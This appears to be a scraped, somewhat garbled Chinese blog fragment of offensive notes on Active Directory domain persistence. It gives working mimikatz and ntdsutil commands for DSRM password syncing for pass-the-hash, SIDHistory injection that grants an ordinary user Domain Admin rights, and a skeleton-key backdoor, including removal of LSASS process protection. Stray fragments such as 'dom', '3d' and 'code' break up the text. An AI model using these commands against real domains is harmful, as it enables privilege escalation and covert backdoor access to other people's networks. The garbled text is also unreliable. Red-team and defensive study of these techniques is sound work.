每次修改都須要重置dsrm密碼,本質上dsrm和administrator是一個帳戶。充值後,administrator的NTLMhash將變成你所掌握的帳號的hash值,能夠進行PtHsass
ntdsutil set dsrm password 重置 DSRM 管理員密碼:sync from domain account ACCOUNTNAME
證實hash值同樣
dom
DomainA中的常規用戶賬戶能夠包含DomainA 的SID,若是DomainA 的SID用於特權賬戶或組,就能夠授予常規用戶賬戶域管理員權限,而不須要成爲域管理員組的成員。debug
PS>Get-AdUser -Properties SIDHistory,memberof mimikatz#privilege::debug mimikatz#sid::add /new:[DomainAdmin's SID or NAME] /sam:[CommonUserNAME]
如此便可使得CommonUserNAME具有DomainAdmins的SIDHistory,從而具有了權限,個人實驗環境的確沒有辦法搞定最後一步,說是缺乏權限,繼續研究中ing
3d
給域內全部帳戶增長一個密碼,統一的,每個域內帳戶均可以按照這個密碼進行認證,其原理是對lsass.exe進行注入,因此重啓後會失效code
#沒有lsass.exe保護的 mimikatz#privilege::debug mimikatz#misc::skeleton #有lsass.exe保護的 """ HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa 新建-DWORD值,名稱爲RunAsPPL,數值爲00000001就能夠保護 """ mimikatz#!+ mimikatz#!processprotect /process:lsass.exe /remove mimikatz#misc::skeleton
默認的密碼是mimikatz
blog